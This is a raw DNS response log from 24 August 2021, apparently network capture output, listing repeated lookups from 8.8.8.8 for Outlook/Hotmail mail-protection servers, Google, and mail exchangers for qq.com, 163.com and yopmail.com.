Aug 24, 2021 08:50:31.960125923 CEST	8.8.8.8	192.168.2.5	0x3557	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.9.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.002609015 CEST	8.8.8.8	192.168.2.5	0xf6f2	No error (0)	eur.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.002609015 CEST	8.8.8.8	192.168.2.5	0xf6f2	No error (0)	eur.olc.protection.outlook.com		104.47.8.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.087798119 CEST	8.8.8.8	192.168.2.5	0x3cd0	No error (0)	m.youtube.com		216.58.215.238	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.226581097 CEST	8.8.8.8	192.168.2.5	0x188b	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.244999886 CEST	8.8.8.8	192.168.2.5	0xde0	No error (0)	eur.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.244999886 CEST	8.8.8.8	192.168.2.5	0xde0	No error (0)	eur.olc.protection.outlook.com		104.47.8.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.247431993 CEST	8.8.8.8	192.168.2.5	0xa34e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.247431993 CEST	8.8.8.8	192.168.2.5	0xa34e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.469598055 CEST	8.8.8.8	192.168.2.5	0xe885	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.502990007 CEST	8.8.8.8	192.168.2.5	0xd7f6	No error (0)	eur.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.502990007 CEST	8.8.8.8	192.168.2.5	0xd7f6	No error (0)	eur.olc.protection.outlook.com		104.47.8.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.543368101 CEST	8.8.8.8	192.168.2.5	0x6624	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.730554104 CEST	8.8.8.8	192.168.2.5	0xec6c	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.754404068 CEST	8.8.8.8	192.168.2.5	0xa7dd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.754404068 CEST	8.8.8.8	192.168.2.5	0xa7dd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.809864998 CEST	8.8.8.8	192.168.2.5	0x7113	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.809864998 CEST	8.8.8.8	192.168.2.5	0x7113	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.004069090 CEST	8.8.8.8	192.168.2.5	0x69bd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.004069090 CEST	8.8.8.8	192.168.2.5	0x69bd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.9.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.187997103 CEST	8.8.8.8	192.168.2.5	0xf7b9	No error (0)	www.google.nl		172.217.168.3	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.269794941 CEST	8.8.8.8	192.168.2.5	0x1f49	No error (0)	eur.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.269794941 CEST	8.8.8.8	192.168.2.5	0x1f49	No error (0)	eur.olc.protection.outlook.com		104.47.8.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.306334019 CEST	8.8.8.8	192.168.2.5	0x5be2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.306334019 CEST	8.8.8.8	192.168.2.5	0x5be2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.562576056 CEST	8.8.8.8	192.168.2.5	0x8ca5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.562576056 CEST	8.8.8.8	192.168.2.5	0x8ca5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.808640957 CEST	8.8.8.8	192.168.2.5	0x9efd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.808640957 CEST	8.8.8.8	192.168.2.5	0x9efd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.928390026 CEST	8.8.8.8	192.168.2.5	0x5ecb	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.928390026 CEST	8.8.8.8	192.168.2.5	0x5ecb	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.011214972 CEST	8.8.8.8	192.168.2.5	0x80cd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.011214972 CEST	8.8.8.8	192.168.2.5	0x80cd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.112529993 CEST	8.8.8.8	192.168.2.5	0xdd7f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.112529993 CEST	8.8.8.8	192.168.2.5	0xdd7f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.210572958 CEST	8.8.8.8	192.168.2.5	0x1ba0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.210572958 CEST	8.8.8.8	192.168.2.5	0x1ba0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.285887003 CEST	8.8.8.8	192.168.2.5	0xbd53	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.285887003 CEST	8.8.8.8	192.168.2.5	0xbd53	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.400055885 CEST	8.8.8.8	192.168.2.5	0xc27f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.400055885 CEST	8.8.8.8	192.168.2.5	0xc27f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.472815990 CEST	8.8.8.8	192.168.2.5	0x2dca	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.472815990 CEST	8.8.8.8	192.168.2.5	0x2dca	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.586380959 CEST	8.8.8.8	192.168.2.5	0xc469	No error (0)	live-com.olc.protection.outlook.com		104.47.9.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.586380959 CEST	8.8.8.8	192.168.2.5	0xc469	No error (0)	live-com.olc.protection.outlook.com		104.47.8.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.766714096 CEST	8.8.8.8	192.168.2.5	0x51d0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.766714096 CEST	8.8.8.8	192.168.2.5	0x51d0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.943918943 CEST	8.8.8.8	192.168.2.5	0x7726	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.943918943 CEST	8.8.8.8	192.168.2.5	0x7726	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.117078066 CEST	8.8.8.8	192.168.2.5	0xb25e	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.141614914 CEST	8.8.8.8	192.168.2.5	0x6354	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.141614914 CEST	8.8.8.8	192.168.2.5	0x6354	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.341007948 CEST	8.8.8.8	192.168.2.5	0x743f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.341007948 CEST	8.8.8.8	192.168.2.5	0x743f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.463296890 CEST	8.8.8.8	192.168.2.5	0xf15d	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.559724092 CEST	8.8.8.8	192.168.2.5	0xc7e1	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.570003986 CEST	8.8.8.8	192.168.2.5	0x3a2a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.570003986 CEST	8.8.8.8	192.168.2.5	0x3a2a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.668752909 CEST	8.8.8.8	192.168.2.5	0x30a5	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.717680931 CEST	8.8.8.8	192.168.2.5	0x8b8a	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.822523117 CEST	8.8.8.8	192.168.2.5	0x8ca5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.822523117 CEST	8.8.8.8	192.168.2.5	0x8ca5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.036793947 CEST	8.8.8.8	192.168.2.5	0x259d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.036793947 CEST	8.8.8.8	192.168.2.5	0x259d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.260627985 CEST	8.8.8.8	192.168.2.5	0x8761	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.260627985 CEST	8.8.8.8	192.168.2.5	0x8761	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.268771887 CEST	8.8.8.8	192.168.2.5	0x7990	No error (0)	msn-com.olc.protection.outlook.com		104.47.4.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.268771887 CEST	8.8.8.8	192.168.2.5	0x7990	No error (0)	msn-com.olc.protection.outlook.com		104.47.6.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.512042999 CEST	8.8.8.8	192.168.2.5	0x3a9a	No error (0)	outlook-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.512042999 CEST	8.8.8.8	192.168.2.5	0x3a9a	No error (0)	outlook-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.520122051 CEST	8.8.8.8	192.168.2.5	0xf8bf	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.520122051 CEST	8.8.8.8	192.168.2.5	0xf8bf	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.525882006 CEST	8.8.8.8	192.168.2.5	0xd6b8	No error (0)	www.google.fr		142.250.203.99	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.690504074 CEST	8.8.8.8	192.168.2.5	0x7d59	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.690504074 CEST	8.8.8.8	192.168.2.5	0x7d59	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.888252974 CEST	8.8.8.8	192.168.2.5	0x6267	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.888252974 CEST	8.8.8.8	192.168.2.5	0x6267	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.181705952 CEST	8.8.8.8	192.168.2.5	0x7c4b	No error (0)	msn-com.olc.protection.outlook.com		104.47.51.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.181705952 CEST	8.8.8.8	192.168.2.5	0x7c4b	No error (0)	msn-com.olc.protection.outlook.com		104.47.56.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.221741915 CEST	8.8.8.8	192.168.2.5	0xb3b5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.221741915 CEST	8.8.8.8	192.168.2.5	0xb3b5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.430032015 CEST	8.8.8.8	192.168.2.5	0xa7a0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.430032015 CEST	8.8.8.8	192.168.2.5	0xa7a0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.653947115 CEST	8.8.8.8	192.168.2.5	0xc6bd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.653947115 CEST	8.8.8.8	192.168.2.5	0xc6bd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.738598108 CEST	8.8.8.8	192.168.2.5	0xab90	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.738598108 CEST	8.8.8.8	192.168.2.5	0xab90	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.844057083 CEST	8.8.8.8	192.168.2.5	0xa7b9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.844057083 CEST	8.8.8.8	192.168.2.5	0xa7b9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.906641006 CEST	8.8.8.8	192.168.2.5	0x5ba8	No error (0)	yopmail.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:38.001396894 CEST	8.8.8.8	192.168.2.5	0x3a5	No error (0)	smtp.yopmail.com		87.98.164.155	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.006917953 CEST	8.8.8.8	192.168.2.5	0xd2ae	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.006917953 CEST	8.8.8.8	192.168.2.5	0xd2ae	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.148485899 CEST	8.8.8.8	192.168.2.5	0x5241	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.148485899 CEST	8.8.8.8	192.168.2.5	0x5241	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.283700943 CEST	8.8.8.8	192.168.2.5	0x6f21	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.283700943 CEST	8.8.8.8	192.168.2.5	0x6f21	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.395282030 CEST	8.8.8.8	192.168.2.5	0xd834	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.395282030 CEST	8.8.8.8	192.168.2.5	0xd834	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.581823111 CEST	8.8.8.8	192.168.2.5	0x44ca	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.581823111 CEST	8.8.8.8	192.168.2.5	0x44ca	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.854696989 CEST	8.8.8.8	192.168.2.5	0xe44e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.854696989 CEST	8.8.8.8	192.168.2.5	0xe44e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.001534939 CEST	8.8.8.8	192.168.2.5	0xbfd	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.109817982 CEST	8.8.8.8	192.168.2.5	0x8fe9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.109817982 CEST	8.8.8.8	192.168.2.5	0x8fe9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.297785997 CEST	8.8.8.8	192.168.2.5	0x475c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.297785997 CEST	8.8.8.8	192.168.2.5	0x475c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.304930925 CEST	8.8.8.8	192.168.2.5	0xf9c0	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.304930925 CEST	8.8.8.8	192.168.2.5	0xf9c0	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.527085066 CEST	8.8.8.8	192.168.2.5	0xe421	No error (0)	msn-com.olc.protection.outlook.com		104.47.59.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.527085066 CEST	8.8.8.8	192.168.2.5	0xe421	No error (0)	msn-com.olc.protection.outlook.com		104.47.55.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.528821945 CEST	8.8.8.8	192.168.2.5	0x6950	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.528821945 CEST	8.8.8.8	192.168.2.5	0x6950	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.782854080 CEST	8.8.8.8	192.168.2.5	0xb9cb	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.782854080 CEST	8.8.8.8	192.168.2.5	0xb9cb	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.058829069 CEST	8.8.8.8	192.168.2.5	0xb669	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.058829069 CEST	8.8.8.8	192.168.2.5	0xb669	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.173688889 CEST	8.8.8.8	192.168.2.5	0x87f9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.173688889 CEST	8.8.8.8	192.168.2.5	0x87f9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.361799955 CEST	8.8.8.8	192.168.2.5	0xd871	No error (0)	eur.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.361799955 CEST	8.8.8.8	192.168.2.5	0xd871	No error (0)	eur.olc.protection.outlook.com		104.47.8.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.471122980 CEST	8.8.8.8	192.168.2.5	0x332e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.471122980 CEST	8.8.8.8	192.168.2.5	0x332e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.962706089 CEST	8.8.8.8	192.168.2.5	0xf66d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.962706089 CEST	8.8.8.8	192.168.2.5	0xf66d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.964728117 CEST	8.8.8.8	192.168.2.5	0x5e11	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.964728117 CEST	8.8.8.8	192.168.2.5	0x5e11	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.003957987 CEST	8.8.8.8	192.168.2.5	0x82e5	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.134438992 CEST	8.8.8.8	192.168.2.5	0x8dd0	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.288347006 CEST	8.8.8.8	192.168.2.5	0x108e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.288347006 CEST	8.8.8.8	192.168.2.5	0x108e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.493309021 CEST	8.8.8.8	192.168.2.5	0x5563	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.493309021 CEST	8.8.8.8	192.168.2.5	0x5563	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.515767097 CEST	8.8.8.8	192.168.2.5	0xd069	No error (0)	163.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:41.515767097 CEST	8.8.8.8	192.168.2.5	0xd069	No error (0)	163.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:41.515767097 CEST	8.8.8.8	192.168.2.5	0xd069	No error (0)	163.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:41.515767097 CEST	8.8.8.8	192.168.2.5	0xd069	No error (0)	163.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:41.698302031 CEST	8.8.8.8	192.168.2.5	0xa8d7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.698302031 CEST	8.8.8.8	192.168.2.5	0xa8d7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.834208965 CEST	8.8.8.8	192.168.2.5	0xc1fa	No error (0)	163mx01.mxmail.netease.com		220.181.14.135	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.834208965 CEST	8.8.8.8	192.168.2.5	0xc1fa	No error (0)	163mx01.mxmail.netease.com		220.181.14.141	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.834208965 CEST	8.8.8.8	192.168.2.5	0xc1fa	No error (0)	163mx01.mxmail.netease.com		220.181.14.143	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.834208965 CEST	8.8.8.8	192.168.2.5	0xc1fa	No error (0)	163mx01.mxmail.netease.com		220.181.14.138	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.834208965 CEST	8.8.8.8	192.168.2.5	0xc1fa	No error (0)	163mx01.mxmail.netease.com		220.181.14.137	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.834208965 CEST	8.8.8.8	192.168.2.5	0xc1fa	No error (0)	163mx01.mxmail.netease.com		220.181.14.140	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.834208965 CEST	8.8.8.8	192.168.2.5	0xc1fa	No error (0)	163mx01.mxmail.netease.com		220.181.14.139	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.834208965 CEST	8.8.8.8	192.168.2.5	0xc1fa	No error (0)	163mx01.mxmail.netease.com		220.181.14.142	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.834208965 CEST	8.8.8.8	192.168.2.5	0xc1fa	No error (0)	163mx01.mxmail.netease.com		220.181.14.136	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.462306976 CEST	8.8.8.8	192.168.2.5	0xa046	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.541585922 CEST	8.8.8.8	192.168.2.5	0x6b2c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.541585922 CEST	8.8.8.8	192.168.2.5	0x6b2c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.574522972 CEST	8.8.8.8	192.168.2.5	0x23e8	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.574522972 CEST	8.8.8.8	192.168.2.5	0x23e8	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.629853964 CEST	8.8.8.8	192.168.2.5	0xd689	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.741570950 CEST	8.8.8.8	192.168.2.5	0x2c9a	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:43.143335104 CEST	8.8.8.8	192.168.2.5	0x78c2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:43.143335104 CEST	8.8.8.8	192.168.2.5	0x78c2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.408365011 CEST	8.8.8.8	192.168.2.5	0xe57b	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.408394098 CEST	8.8.8.8	192.168.2.5	0x78c2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.408394098 CEST	8.8.8.8	192.168.2.5	0x78c2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.689294100 CEST	8.8.8.8	192.168.2.5	0xeb07	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
